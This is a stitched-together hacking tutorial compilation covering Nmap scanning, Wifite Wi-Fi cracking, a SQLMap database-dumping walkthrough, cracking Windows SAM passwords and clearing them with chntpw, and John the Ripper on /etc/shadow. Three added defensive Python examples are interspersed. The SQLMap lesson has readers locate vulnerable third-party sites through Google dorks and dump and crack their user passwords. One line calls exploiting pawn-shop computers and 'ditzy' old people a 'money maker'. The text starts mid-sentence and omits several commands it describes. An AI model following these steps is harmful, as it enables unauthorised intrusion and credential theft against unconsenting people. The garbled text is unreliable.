is user-friendly and boasts a wide variety of features.
Nmap (Network Mapper) is a free and open source utility for network exploration and security auditing. Many
systems and network administrators also find it useful for tasks such as network inventory, managing service
upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to
determine what hosts are available on the network, what services (application name and version) those hosts
are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls
are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine
against single hosts. Nmap runs on all major computer operating systems, and both console and graphical
versions are available.
This chapter uses fictional stories to provide a broad overview of Nmap and how it is typically used. An
important legal section helps users avoid (or at least be aware of) controversial usage that could lead to ISP
account cancellation or even civil and criminal charges. It also discusses the risks of crashing remote machines
as well as miscellaneous issues such as the open source Nmap license (based on the GNU GPL), and
copyright.
Sometimes the best way to understand something is to see it in action. This section includes examples of
Nmap used in (mostly) fictional yet typical circumstances. Nmap newbies should not expect to understand
everything at once. This is simply a broad overview of features that are described in depth in later chapters.
The solutions included throughout this book demonstrate many other common Nmap tasks for security
auditors and network administrators.
Avatar Online
Felix dutifully arrives at work on December 15th, although he does not expect many structured tasks. The small
San Francisco penetration-testing firm he works for has been quiet lately due to impending holidays. Felix
spends business hours pursuing his latest hobby of building powerful Wi-Fi antennas for wireless assessments
and war driving exploration. Nevertheless, Felix is hoping for more business. Hacking has been his hobby and
fascination since a childhood spent learning everything he could about networking, security, Unix, and phone
systems. Occasionally his curiosity took him too far, and Felix was almost swept up in the 1990 Operation
Sundevil prosecutions. Fortunately Felix emerged from adolescence without a criminal record, while retaining
his expert knowledge of security weaknesses. As a professional, he is able to perform the same types of
network intrusions as before, but with the added benefit of contractual immunity from prosecution and even a
paycheck! Rather than keeping his creative exploits secret, he can brag about them to client management
when presenting his reports. So Felix was not disappointed when his boss interrupted his antenna soldering to
announce that the sales department closed a pen-testing deal with the Avatar Online gaming company.
Avatar Online (AO) is a small company working to create the next generation of massive multi-player online
role-playing games (MMORPGs). Their product, inspired by the Metaverse envisioned in Neal
Stephenson's Snow Crash, is fascinating but still highly confidential. After witnessing the high-profile leak of
Valve Software's upcoming game source code, AO quickly hired the security consultants. Felix's task is to
initiate an external (from outside the firewall) vulnerability assessment while his partners work on physical
security, source code auditing, social engineering, and so forth. Felix is permitted to exploit any vulnerabilities
found.
The first step in a vulnerability assessment is network discovery. This reconnaissance stage determines what
IP address ranges the target is using, what hosts are available, what services those hosts are offering, general
network topology details, and what firewall/filtering policies are in effect.
Determining the IP ranges to scan would normally be an elaborate process involving ARIN (or another
geographical registry) lookups, DNS queries and zone transfer attempts, various web sleuthing techniques, and
more. But in this case, Avatar Online explicitly specified what networks they want tested: the corporate network
on 6.209.24.0/24 and their production/DMZ systems residing on 6.207.0.0/22. Felix checks the IP whois
records anyway and confirms that these IP ranges are allocated to AO[1]. Felix subconsciously decodes the
CIDR notation[2] and recognizes this as 1,280 IP addresses. No problem.
Being the careful type, Felix first starts out with what is known as an Nmap list scan (-sL option). This feature
simply enumerates every IP address in the given target netblock(s) and does a reverse-DNS lookup (unless -n
was specified) on each. One reason to do this first is stealth. The names of the hosts can hint at potential
vulnerabilities and allow for a better understanding of the target network, all without raising alarm bells[3]. Felix
is doing this for another reason: to double-check that the IP ranges are correct. The systems administrator
who provided the IPs might have made a mistake, and scanning the wrong company would be a disaster. The
contract signed with Avatar Online may act as a get-out-of-jail-free card for penetrating their networks, but will
not help if Felix accidentally compromises another company's server! The command he uses and an excerpt of
the results are shown in Example 1.1.
felix> nmap -sL 6.209.24.0/24 6.207.0.0/22
Starting Nmap ( http://nmap.org )
Nmap scan report for 6.209.24.0
Nmap scan report for 6.209.24.3
Nmap scan report for 6.209.24.4
...
Nmap scan report for 6.207.0.5
Nmap scan report for 6.207.0.6
Nmap scan report for 6.207.0.8
...
Nmap scan report for cluster-c120.avataronline.com (6.207.2.120)
Reading over the results, Felix finds that all of the machines with reverse-DNS entries resolve to Avatar Online.
No other businesses seem to share the IP space. Moreover, these results give Felix a rough idea of how many
machines are in use and a good idea of what many are used for. He is now ready to get a bit more intrusive
and try a port scan. He uses Nmap features that try to determine the application and version number of each
service listening on the network. He also requests that Nmap try to guess the remote operating system via a
series of low-level TCP/IP probes known as OS fingerprinting. This sort of scan is not at all stealthy, but that
does not concern Felix. He is interested in whether the administrators of AO even notice these blatant scans.
After a bit of consideration, Felix settles on the following command:
nmap -sS -p- -PE -PP -PS80,443 -PA3389 -PU40125 -A -T4 -oA avatartcpscan-%D 6.209.24.0/24 6.207.0.0/22
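Felix wonders whether AO's administrators will even notice a scan this blatant. The following is an added example, not part of the Nmap chapter quoted above, showing the detection logic a defender would run over firewall logs: any source that sends SYNs to many distinct ports on one host inside a short window is reported. The iptables-style log lines are constructed for the demonstration, and the thresholds are assumptions to tune for a real network.

```python
"""Flag SYN-scan behaviour in iptables-style firewall logs (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime

PORT_THRESHOLD = 20    # distinct destination ports per (src, dst) pair before alerting
WINDOW_SECONDS = 10.0  # sliding window length

# Fields as written by an iptables LOG rule for a TCP packet with the SYN flag set.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ kernel: .*?"
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?PROTO=TCP SPT=\d+ DPT=(?P<dpt>\d+) "
    r".*?\bSYN\b"
)


def parse_syn(line):
    """Return (timestamp, src, dst, dport) for a logged SYN packet, else None."""
    m = LOG_RE.search(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")  # syslog stamps carry no year
    return ts, m.group("src"), m.group("dst"), int(m.group("dpt"))


def detect_scans(lines, threshold=PORT_THRESHOLD, window=WINDOW_SECONDS):
    """Return {(src, dst): {"first_seen": str, "ports": int}} for pairs that look like a scan."""
    recent = defaultdict(deque)  # (src, dst) -> deque of (ts, dport), oldest first
    alerts = {}
    for line in lines:
        parsed = parse_syn(line)
        if parsed is None:
            continue
        ts, src, dst, dport = parsed
        q = recent[(src, dst)]
        q.append((ts, dport))
        while (ts - q[0][0]).total_seconds() > window:  # expire probes outside the window
            q.popleft()
        distinct = {p for _, p in q}
        if len(distinct) >= threshold:
            entry = alerts.setdefault(
                (src, dst), {"first_seen": q[0][0].strftime("%H:%M:%S"), "ports": 0})
            entry["ports"] = max(entry["ports"], len(distinct))
    return alerts


def build_sample_log():
    """Constructed traffic, not a capture: one scanner probing 25 ports on
    6.207.0.5 within two seconds, plus a normal client reusing ports 80/443."""
    tmpl = ("Dec 15 09:12:{sec:02d} fw kernel: IN=eth0 OUT= SRC={src} DST=6.207.0.5 "
            "LEN=44 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=TCP SPT={spt} DPT={dpt} "
            "WINDOW=1024 RES=0x00 SYN URGP=0")
    lines = [tmpl.format(sec=1 + i // 13, src="198.51.100.7", spt=40000 + i, dpt=1 + i)
             for i in range(25)]
    lines += [tmpl.format(sec=i, src="203.0.113.9", spt=50000 + i, dpt=80 if i % 2 else 443)
              for i in range(30)]
    return lines


if __name__ == "__main__":
    for (src, dst), info in detect_scans(build_sample_log()).items():
        print(f"{src} -> {dst}: {info['ports']} distinct ports since {info['first_seen']}")
```

A full-port scan at -T4 touches thousands of ports per second, so it trips the rule within its first second of traffic; the normal client, which only ever reaches two ports, never does. Only SYN packets are counted, so established connections (ACK-only lines) do not inflate the totals.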
Intro
Nmap (Network Mapper) is an open source tool for network exploration and security auditing. It was
designed to rapidly scan large networks, although it works fine against single hosts. It uses raw IP packets in
novel ways to determine what hosts are available on the network, what services (application name and version)
those hosts are offering, what operating systems (and OS versions) they are running, what type
of packet filters/firewalls are in use, and dozens of other characteristics. While Network Mapper is
commonly used for security audits, many systems and network administrators find it useful for routine tasks
such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.
A. GUI method
EX nmap 192.168.75.131
3. Speed up your nmap scan: using this command you can decrease the scan time
Ex nmap -F google.com
Ex nmap 192.168.75.1/24
Ex nmap -O 192.168.75.131
Ex nmap -sT 192.168.75.131
Ex nmap -sN 192.168.75.131
Ex nmap -sF 192.168.75.131
Ex nmap -sX 192.168.75.131
8. UDP scan: scan a host for UDP services. This scan is used to view open UDP ports.
Ex nmap -sU 192.168.75.131
9. Scan for IP protocols: this type of scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.)
are supported by target machines.
Ex nmap -sO 192.168.75.131
10. Detect remote service (server/daemon) version numbers
Ex nmap -sV 192.168.75.131
11. Find out the most commonly used TCP ports using a TCP SYN scan
A. Stealthy scan
Ex nmap -sS 192.168.75.131
B. Find out the most commonly used TCP ports using a TCP connect scan
Ex nmap -sT 192.168.75.131
C. Find out the most commonly used TCP ports using a TCP ACK scan
Ex nmap -sA 192.168.75.131
D. Find out the most commonly used TCP ports using a TCP Window scan
Ex nmap -sW 192.168.75.131
E. Find out the most commonly used TCP ports using a TCP Maimon scan
Ex nmap -sM 192.168.75.131
Ex nmap -sL 192.168.75.131
13. Host discovery or ping scan: scan a network and find out which servers and devices are up and running
Ex nmap -sP 192.168.75.0/24
14. Scan a host when it is protected by a firewall
Ex nmap -PN 192.168.75.1
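The scans above are more useful to a network administrator when their output is kept and compared over time. The following is an added example, not part of this tutorial: it reads Nmap's XML output (written with -oX, or with -oA as in Felix's scan) into an inventory and diffs it against a stored baseline, so a newly listening service or a new host on your own network shows up as a change. The two XML documents are constructed to resemble trimmed scans of the lab host used in the examples and are not real scan results.

```python
"""Turn Nmap XML output into an inventory and diff it against a baseline (added example)."""
import xml.etree.ElementTree as ET

# Constructed Nmap XML, shaped like real -oX output but not produced by a scan.
BASELINE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/>
    <address addr="192.168.75.131" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/><service name="https"/></port>
    </ports>
  </host>
</nmaprun>"""

CURRENT_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/>
    <address addr="192.168.75.131" addrtype="ipv4"/>
    <address addr="00:0C:29:AA:BB:CC" addrtype="mac"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="192.168.75.140" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp"/></port>
    </ports>
  </host>
  <host><status state="down"/>
    <address addr="192.168.75.150" addrtype="ipv4"/>
  </host>
</nmaprun>"""


def open_ports(nmap_xml):
    """Return {ipv4: {(proto, port): service_name}} for hosts Nmap reported as up."""
    inventory = {}
    for host in ET.fromstring(nmap_xml).findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # down hosts carry no port data worth tracking
        addrs = [a.get("addr") for a in host.findall("address") if a.get("addrtype") == "ipv4"]
        if not addrs:
            continue
        services = {}
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not listening services
            svc = port.find("service")
            name = svc.get("name", "unknown") if svc is not None else "unknown"
            services[(port.get("protocol"), int(port.get("portid")))] = name
        inventory[addrs[0]] = services
    return inventory


def diff_inventory(baseline, current):
    """Return (appeared, disappeared): per-host dicts of open ports that changed."""
    appeared, disappeared = {}, {}
    for ip in set(baseline) | set(current):
        before, now = baseline.get(ip, {}), current.get(ip, {})
        added = {k: now[k] for k in now.keys() - before.keys()}
        removed = {k: before[k] for k in before.keys() - now.keys()}
        if added:
            appeared[ip] = added
        if removed:
            disappeared[ip] = removed
    return appeared, disappeared


if __name__ == "__main__":
    new, gone = diff_inventory(open_ports(BASELINE_XML), open_ports(CURRENT_XML))
    for ip, ports in sorted(new.items()):
        for (proto, port), svc in sorted(ports.items()):
            print(f"NEW  {ip} {port}/{proto} ({svc})")
    for ip, ports in sorted(gone.items()):
        for (proto, port), svc in sorted(ports.items()):
            print(f"GONE {ip} {port}/{proto} ({svc})")
```

Run against two real -oX files, the diff reports the RDP service that appeared on the lab host and the new FTP host, which is exactly the kind of change an administrator wants to hear about before an outsider finds it.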
Lesson 6: Wifi Hacking the easy way: Using WIFITE
Wifite
While the aircrack-ng suite is a well-known name in wireless hacking, the same can't be said about Wifite.
Living in the shade of the greatness of the established aircrack-ng suite, Wifite has finally made a mark in a field
where aircrack-ng failed. It made wifi hacking everyone's piece of cake. While all its features are not
independent (e.g. it hacks WPS using Reaver), it does what it promises, and puts hacking on autopilot. I'm
listing some features before I tell you how to use Wifite (which I don't think is necessary at all, as anyone who
can understand the simple English instructions given by Wifite can use it on their own).
Features Of Wifite
Sorts targets by signal strength (in dB); cracks closest access points first
Numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
"Anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks
are complete
Smart WPA de-authentication; cycles between all clients and broadcast deauths
Stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit
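The "anonymous" feature above is visible from the access point's side: a randomly generated MAC almost always has the locally-administered bit (bit 1 of the first octet) set, because it is not a vendor-assigned OUI. The following is an added example, not part of the Wifite tutorial, that screens an association log for that bit. The log lines and their format are constructed for the demonstration and do not follow any particular vendor's syntax.

```python
"""Spot clients that associated using a locally-administered MAC address (added example)."""
import re

MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}$")

# Constructed access-point association log (not a real capture).
ASSOC_LOG = [
    "12:00:01 assoc  client=3C:22:FB:12:34:56 bssid=AA:BB:CC:00:11:22",
    "12:00:05 assoc  client=02:9F:40:AB:CD:EF bssid=AA:BB:CC:00:11:22",
    "12:00:09 assoc  client=da:1b:2c:3d:4e:5f bssid=AA:BB:CC:00:11:22",
    "12:00:12 assoc  client=00:1A:2B:3C:4D:5E bssid=AA:BB:CC:00:11:22",
    "12:00:15 deauth client=3C:22:FB:12:34:56 bssid=AA:BB:CC:00:11:22",
]


def classify_mac(mac):
    """Decode the two flag bits carried in the first octet of a MAC address."""
    if not MAC_RE.match(mac):
        raise ValueError(f"not a MAC address: {mac!r}")
    first_octet = int(mac[:2], 16)
    return {
        "multicast": bool(first_octet & 0x01),             # I/G bit: group address
        "locally_administered": bool(first_octet & 0x02),  # U/L bit: not a vendor OUI
    }


def flag_random_clients(log_lines):
    """Return the set of client MACs that associated with a locally-administered address."""
    flagged = set()
    for line in log_lines:
        m = re.search(r"\bassoc\s+client=(\S+)", line)
        if m is None:
            continue  # only association events carry a new client
        mac = m.group(1).upper()
        if classify_mac(mac)["locally_administered"]:
            flagged.add(mac)
    return flagged


if __name__ == "__main__":
    for mac in sorted(flag_random_clients(ASSOC_LOG)):
        print("locally-administered client:", mac)
```

Treat a hit as a triage cue rather than proof: phones and laptops that randomize their Wi-Fi MAC set the same bit, so the signal is worth correlating with the deauthentication bursts the feature list mentions before drawing any conclusion.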
I find it worth mentioning here that not only does it hack wifi the easy way, it also hacks in the best possible
way.
For example, when you are hacking a WEP wifi using Wifite, it uses fakeauth and uses the ARP method to
speed up data packets.
wifite -wep
The -wep makes it clear to Wifite that you want to hack WEP wifis only. It'll scan the networks for you, and when
you think it has scanned enough, you can tell it to stop by typing Ctrl+C. It'll then ask you which wifi to hack. In
my case, I didn't specify -wep so it shows all the wifis in range.
You can also select all and then go take a nap (or maybe go to sleep). When you wake up, you might be
hacking all the wifi passwords in front of you. I typed one and it had gathered 7000 IVs (data packets)
within 5 mins. Basically you can expect it to hack the wifi in approx. 10 mins. Notice how it automatically did the
fake auth and ARP replay.
Here are a few more screenshots of the working of Wifite, from their official website. (./wifite.py is not something
that should bother you; you can stick with the simple wifite.
Also, specifying the channel is optional, so even the -c 6 was unnecessary. Notice that instead of ARP replay,
the fragmentation attack was used, using -frag.)
Hacking WPS wasn't fast (it took hours), but it was easy and didn't require you to do anything but wait.
However, Wifite makes it possible for you to use any method that you want to use, by just naming it. As you
saw in the screenshot above, the fragmentation attack was carried out just by typing -frag. Similarly, many
other attacks can be played with. A good idea would be to execute the following:
wifite -help
This will tell you about the common usage commands, which will be very useful. Here is the list of WEP
commands for different attacks:
WEP
-wep only target WEP networks [off]
-pps <num> set the number of packets per second to inject [600]
-wept <sec> sec to wait for each attack, 0 implies endless [600]
-chopchop use chopchop attack [on]
-arpreplay use arpreplay attack [on]
-fragment use fragmentation attack [on]
-caffelatte use caffe-latte attack [on]
-p0841 use -p0841 attack [on]
-hirte use hirte (cfrag) attack [on]
-nofakeauth stop attack if fake authentication fails [off]
-wepca <n> start cracking when number of ivs surpass n [10000]
-wepsave save a copy of .cap files to this directory [off]
Troubleshooting
Wifite quits unexpectedly, stating "Scanning for wireless devices. No wireless interfaces were found. You need
to plug in a wifi device or install drivers. Quitting."
You are most probably using Kali inside a virtual machine. A virtual machine does not support the internal
wireless card. Either buy an external wireless card, or do a live boot / side boot with Windows; anything other
than a virtual machine, in general.
Lesson 7: Sql Injection using SQLMap
Disclaimer: using this program on any website without permission is illegal. By reading and/or utilizing this
tutorial you accept sole responsibility for your actions and release Opsec Cybersecurity Solutions LLC and its
employees from any legal liability for your actions.
SQL injection is a way of extracting user login info and other data from insecure SQL databases on companies'
servers. It is one of the most common ways sites are hacked.
What is SQLMAP
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL
injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche
features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting,
over data fetching from the database, to accessing the underlying file system and executing commands on the
operating system via out-of-band connections.
Features
Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite,
Firebird, Sybase and SAP MaxDB database management systems.
Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION
query, stacked queries and out-of-band.
Support to directly connect to the database without passing via a SQL injection, by providing DBMS
credentials, IP address, port and database name.
Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
Automatic recognition of password hash formats and support for cracking them using a dictionary-based
attack.
Support to dump database tables entirely, a range of entries or specific columns as per the user's choice. The
user can also choose to dump only a range of characters from each column's entry.
Support to search for specific database names, specific tables across all databases or specific columns across
all databases' tables. This is useful, for instance, to identify tables containing custom application credentials
where relevant column names contain strings like name and pass.
Support to download and upload any file from the database server's underlying file system when the database
software is MySQL, PostgreSQL or Microsoft SQL Server.
Support to execute arbitrary commands and retrieve their standard output on the database server underlying
operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
Support to establish an out-of-band stateful TCP connection between the attacker machine and the database
server underlying operating system. This channel can be an interactive command prompt, a Meterpreter
session or a graphical user interface (VNC) session as per the user's choice.
Support for database process user privilege escalation via Metasploit's Meterpreter getsystem command.
[Source: www.sqlmap.org]
Step 1: Find a Vulnerable Website
This is usually the toughest bit and takes longer than any other step. Those who know how to use Google
Dorks know this already, but in case you don't, I have put together a number of strings that you can search in
Google. Just copy and paste any of the lines into Google and Google will show you a number of search results.
Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website
Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection
For every Google dork string, you will get hundreds of search results. How do you know which is really
vulnerable to SQLMAP SQL Injection? There are multiple ways and I am sure people would argue which one is
best, but to me the following is the simplest and most conclusive.
Let's say you searched using the string inurl:item_id= and one of the search results shows a website like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15
Just add a single quotation mark ' at the end of the URL. (Just to be clear, " is a double quotation mark and ' is a
single quotation mark.)
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'
If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirects you to
a different page, move on to the next site in your Google search results page.
See the example error below in the screenshot. I've obscured everything including the URL and page design for
obvious reasons.
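Why a single quote produces that error, and what the fix looks like, is easiest to see against a local database. The following is an added example, not part of the tutorial: make_db() builds a throwaway in-memory SQLite table shaped like the item.cgi?item_id=15 page, lookup_item_vulnerable() builds its SQL by string formatting (the defect the trailing ' exposes), and lookup_item_safe() is the corrected form, where the value is bound as a parameter and never becomes part of the SQL text. All table data is constructed.

```python
"""The Step 1.b quote test reproduced against a local SQLite table (added example)."""
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the item_id lookup page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE item (item_id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO item VALUES (?, ?, ?)",
                     [(15, "widget", 9.5), (16, "gadget", 12.0)])
    return conn


def lookup_item_vulnerable(conn, item_id):
    """Untrusted input pasted into the statement: a stray quote rewrites the SQL."""
    query = "SELECT name, price FROM item WHERE item_id = '%s'" % item_id
    return conn.execute(query).fetchall()


def lookup_item_safe(conn, item_id):
    """Parameterised: the driver binds item_id as data, whatever characters it contains."""
    return conn.execute("SELECT name, price FROM item WHERE item_id = ?", (item_id,)).fetchall()


def probe(conn, lookup, item_id):
    """Run one lookup and report what the page would show: ('ok', rows) or ('error', message)."""
    try:
        return "ok", lookup(conn, item_id)
    except sqlite3.Error as exc:
        # This is the 'SQL error' the quote test tells you to look for.
        return "error", str(exc)


if __name__ == "__main__":
    db = make_db()
    for value in ("15", "15'"):
        print(repr(value), "vulnerable:", probe(db, lookup_item_vulnerable, value))
        print(repr(value), "safe:      ", probe(db, lookup_item_safe, value))
```

With "15" both versions return the widget row. With "15'" the formatted query becomes `... WHERE item_id = '15''`, an unterminated string the database rejects, which is the error the tutorial's screenshot shows; the parameterised version simply finds no row. Hiding database errors from the client would defeat this particular test, but only parameterisation removes the injection itself.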
Server Error in / Application. Unclosed quotation mark before the character string attack;.
Description: An unhanded exception occurred during the execution of the current web request. Please review
the stack trace for more information about the error where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string
attack;.
MySQL Errors
Oracle Errors
PostgreSQL Errors
As you can see from the screenshot above, I've found a SQLMAP SQL Injection vulnerable website. Now I
need to list all the databases on that vulnerable server (this is also called enumerating the number of columns).
As I am using SQLMAP, it will also tell me which one is vulnerable.
Here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15)
--dbs = Enumerate DBMS databases
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'
So we now have two databases that we can look into. information_schema is a standard database for almost
every MySQL database server, so our interest would be in the sqldummywebsite database.
Now we need to know how many tables this sqldummywebsite database has and what their names are. To find
out that information, use the following command:
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info
And of course we want to check what's inside the user_info table using SQLMAP SQL Injection, as that table
probably contains usernames and passwords.
Step 4: List columns on target table of selected database using SQLMAP SQL Injection
Now we need to list all the columns of the target table user_info of the sqldummywebsite database using SQLMAP
SQL Injection. SQLMAP SQL Injection makes it really easy; run the following command:
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)
AHA! This is exactly what we are looking for: the target columns user_login and user_password.
Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL
Injection
SQLMAP SQL Injection makes it easy! Just run the following command again:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes
Almost there; we now only need the password for this user. The next step shows just that.
Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL
Injection
You're probably getting used to how to use the SQLMAP SQL Injection tool. Use the following command to
extract the password for the user.
[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+
But hang on, this password looks funny. This can't be someone's password. Someone who leaves their
website vulnerable like that just can't have a password like that.
That is exactly right. This is a hashed password. What that means is that the password is encrypted and now we
need to decrypt it.
So the hashed password is 24iYBc17xK0e. (including the trailing dot). How do you know what type of hash that is?
Luckily, Kali Linux provides a nice tool and we can use it to identify which type of hash this is. On the command
line type in the following command and at the prompt paste the hash value:
hash-identifier
First of all I need to know which code to use for DES hashes. So let's check that:
cudahashcat --help | grep DES
So it's either 1500 or 3100. But it was a MySQL database, so it must be 1500.
I am running a computer that's got an NVIDIA graphics card. That means I will be using cudaHashcat. On my
laptop, I've got an AMD ATI graphics card, so I will be using oclHashcat on my laptop. If you're on VirtualBox or
VMWare, neither cudaHashcat nor oclHashcat will work. You must install Kali on either a persistent USB or a
hard disk. Instructions are on the website; search around.
I saved the hash value 24iYBc17xK0e. in the DES.hash file. The following is the command I am running:
Interesting find: the usual Hashcat was unable to determine the code for the DES hash (not in its help menu).
However both cudaHashcat and oclHashcat found and cracked the key.
24iYBc17xK0e.:abc123
This is probably your number one money maker: pawn shops whose computers were forfeited and need to be
sold, and citizens and old people who are just ditzy. Enjoy.
Insert the USB live CD and boot your PC. Make sure "Boot from USB" is the first option in the boot menu in the
BIOS.
Boot the Windows machine with the live CD. On the boot menu of Kali Linux, select Live (forensic mode). Kali
Linux initializes and when it loads, it will open a terminal window and navigate to the Windows password
database file.
After loading live Kali Linux, go to the system menu > ophcrack and click OK.
Ophcrack uses rainbow tables to crack NTLM and LM hashes into plain text; it's a free Windows password
cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of
the method. If you have a complex password it will take a lot longer than for simple passwords, and with the free
tables your password may never be cracked.
Once the crack is done you will see the password in plain text; write it down and reboot the machine to log in. If
your password isn't cracked, you can also log in as one of the other users with admin rights and then change
your password from within Windows.
With the free tables available you will not be able to crack every password, but the paid tables range from $100
to $1000.
Windows uses NTLM hashes to encrypt the password file, which gets stored in the SAM file. We simply
need to target this file to retrieve the password.
Now you can see the ophcrack application window. Here, click on Load > Encrypted SAM.
After that we need to give the path to the SAM directory, which is by default /mnt/hda1/WINDOWS/System32;
click Choose.
Here we can see the saved hashes now with the username and user ID.
Now click on the Crack button and wait for the password. It's quick and easy.
That's it. It'll show the password if you succeed with the free tables. I downloaded the XP free small and
the Vista free tables. Once you have downloaded the tables you will need to unzip them into separate folders. I
made a folder called hash-tables and then made 2 more folders within it for each table to unzip to.
Run the program and click on the Tables button. Select the table you downloaded and click Install, navigate to
the folder where you unzipped the table, select it and then click OK. You should see green lights next to the
tables you installed.
Navigate to the Windows password database file. Almost all versions of Windows save passwords in the SAM
file. This file is usually located under /Windows/System32/config. On your system it may look something like
this: /media/hda1/Windows/System32/config.
Type command chntpw -l SAM and it will list out all the usernames that are contained on the Windows system.
#chntpw -l SAM
The command gives us a list of usernames on the system. When we have the username we want to modify,
we simply run the command chntpw -u username SAM
In the example below we typed: chntpw -u Sanjai sathish SAM and we get the following menu:
We now have the option of clearing the password, changing the password, or promoting the user to
administrator. Changing the password does not always work on Windows 7 and 8 systems; it may work on XP
systems, so it is recommended to clear the password. Then you will be able to log in with a blank password.
You can also promote the user to a local administrator.
John the Ripper is a fast password cracker. Its primary purpose is to detect weak Unix passwords. Besides
several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box
are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.
John the Ripper is a popular dictionary-based password cracking tool. It uses a wordlist full of passwords and
then tries to crack a given password hash using each of the passwords from the wordlist. In other words it's
called brute-force password cracking and is the most basic form of password cracking. It is also the most time-
and CPU-consuming technique. The more passwords to try, the more time required.
But still, if you want to crack a password locally on your system, then John is one of the good tools to try. John is
in the top 10 security tools in Kali Linux.
In this topic I am going to show you how to use the unshadow command along with John to crack the passwords
of users on a Linux system. On Linux the username/password details are stored in the following 2 files:
#/etc/passwd
#/etc/shadow
The actual password hash is stored in /etc/shadow and this file is accessible only with root access to the
machine. So try to get this file from your own Linux system, or first create a new user with a simple password. I
will create a new user on my Linux system named happy, with password chess.
Now that our new user is created, it's time to crack his password.
#unshadow
The unshadow command basically combines the data of /etc/passwd and /etc/shadow to create one file with
username and password details. Usage is quite simple.
Now this new file shall be cracked by John. For the wordlist we shall be using the password list that comes with
John on Kali Linux. It is located at /usr/share/john/password.lst, or you can use your own
password lists too.
Use the --show option to display all of the cracked passwords reliably:
So in the above command John was able to crack the hash and get us the password chess for the user
happy. Now John was able to crack it only because the password chess was present in the password list. If it
were not there then John would have failed.
